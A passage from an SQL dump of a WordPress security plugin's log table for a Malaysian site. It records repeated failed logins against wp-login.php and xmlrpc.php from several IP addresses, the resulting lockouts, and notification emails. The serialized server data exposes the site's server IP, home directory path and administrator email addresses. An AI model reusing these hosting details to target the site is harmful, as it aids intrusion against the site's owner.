11:45:23',18087304,19286104,'https://bintara.com.my/wp/wp-login.php',1,0,'188.165.250.134'),(25739,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/wp/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/wp/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/wp/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYNVXkXpgmG5P@iB8kcPAAAAIg\";s:12:\"REDIRECT_URL\";s:14:\"/wp/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:15:\"188.165.250.134\";s:11:\"REMOTE_PORT\";s:5:\"55429\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/wp/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:14:\"/wp/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYNVXkXpgmG5P@iB8kcPAAAAIg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569066325.1653\";s:12:\"REQUEST_TIME\";s:10:\"1569066325\";}}','notice','2019-09-21 11:45:26','2019-09-21 11:45:25',18314904,19612624,'https://bintara.com.my/wp/xmlrpc.php',1,0,'188.165.250.134'),(25740,0,'lockout','username-lockout::admin','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:5:\"admin\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:45:25\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:45:25\";s:14:\"lockout_expire\";s:19:\"2019-09-21 20:00:25\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 12:00:25\";s:16:\"lockout_username\";s:5:\"admin\";}','action','2019-09-21 11:45:26','2019-09-21 11:45:25',18395144,19612624,'https://bintara.com.my/wp/xmlrpc.php',1,0,'188.165.250.134'),(25741,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:45:26','2019-09-21 11:45:25',18602928,19612624,'https://bintara.com.my/wp/xmlrpc.php',1,0,'188.165.250.134'),(25742,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYNXViJ7D9Gn7wDPh8ZiAAAANI\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"157.230.55.177\";s:11:\"REMOTE_PORT\";s:5:\"24211\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYNXViJ7D9Gn7wDPh8ZiAAAANI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569066333.8385\";s:12:\"REQUEST_TIME\";s:10:\"1569066333\";}}','notice','2019-09-21 11:45:35','2019-09-21 11:45:34',17799128,19290208,'https://bintara.com.my/2019/wp-login.php',1,0,'157.230.55.177'),(25743,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:45:34\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:45:34\";s:14:\"lockout_expire\";s:19:\"2019-09-21 20:00:34\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 12:00:34\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:45:35','2019-09-21 11:45:34',17884136,19290208,'https://bintara.com.my/2019/wp-login.php',1,0,'157.230.55.177'),(25744,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:45:35','2019-09-21 11:45:34',18090488,19290208,'https://bintara.com.my/2019/wp-login.php',1,0,'157.230.55.177'),(25745,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYNXliJ7D9Gn7wDPh8ZiQAAANc\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"198.199.83.232\";s:11:\"REMOTE_PORT\";s:5:\"34752\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYNXliJ7D9Gn7wDPh8ZiQAAANc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569066334.3282\";s:12:\"REQUEST_TIME\";s:10:\"1569066334\";}}','notice','2019-09-21 11:45:35','2019-09-21 11:45:34',17797904,19288920,'https://bintara.com.my/wordpress/wp-login.php',1,0,'198.199.83.232'),(25746,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:45:34\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:45:34\";s:14:\"lockout_expire\";s:19:\"2019-09-21 20:00:34\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 12:00:34\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:45:35','2019-09-21 11:45:34',17882920,19288920,'https://bintara.com.my/wordpress/wp-login.php',1,0,'198.199.83.232'),(25747,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:45:35','2019-09-21 11:45:34',18088632,19288920,'https://bintara.com.my/wordpress/wp-login.php',1,0,'198.199.83.232'),(25748,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYNdrfBTP0kPOVnb8jqzAAAAFg\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"188.165.250.134\";s:11:\"REMOTE_PORT\";s:5:\"58786\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYNdrfBTP0kPOVnb8jqzAAAAFg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569066358.4749\";s:12:\"REQUEST_TIME\";s:10:\"1569066358\";}}','notice','2019-09-21 11:45:59','2019-09-21 11:45:58',17799144,19288560,'https://bintara.com.my/2019/wp-login.php',1,0,'188.165.250.134'),(25749,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:45:58\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:45:58\";s:14:\"lockout_expire\";s:19:\"2019-09-21 20:00:58\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 12:00:58\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:45:59','2019-09-21 11:45:58',17883992,19288560,'https://bintara.com.my/2019/wp-login.php',1,0,'188.165.250.134'),(25750,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:45:59','2019-09-21 11:45:58',18089648,19288560,'https://bintara.com.my/2019/wp-login.php',1,0,'188.165.250.134'),(25751,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYNeHkXpgmG5P@iB8kccAAAAIo\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:11:\"138.68.30.2\";s:11:\"REMOTE_PORT\";s:5:\"44922\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYNeHkXpgmG5P@iB8kccAAAAIo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569066360.3282\";s:12:\"REQUEST_TIME\";s:10:\"1569066360\";}}','notice','2019-09-21 11:46:01','2019-09-21 11:46:00',17799952,19289736,'https://bintara.com.my/test/wp-login.php',1,0,'138.68.30.2'),(25752,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:46:00\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:46:00\";s:14:\"lockout_expire\";s:19:\"2019-09-21 20:01:00\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 12:01:00\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:46:01','2019-09-21 11:46:00',17884880,19289736,'https://bintara.com.my/test/wp-login.php',1,0,'138.68.30.2'),(25753,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:46:01','2019-09-21 11:46:00',18091064,19289736,'https://bintara.com.my/test/wp-login.php',1,0,'138.68.30.2'),(25754,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYNknkXpgmG5P@iB8kclQAAAJU\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"159.65.155.117\";s:11:\"REMOTE_PORT\";s:5:\"38142\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYNknkXpgmG5P@iB8kclQAAAJU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569066386.6037\";s:12:\"REQUEST_TIME\";s:10:\"1569066386\";}}','notice','2019-09-21 11:46:27','2019-09-21 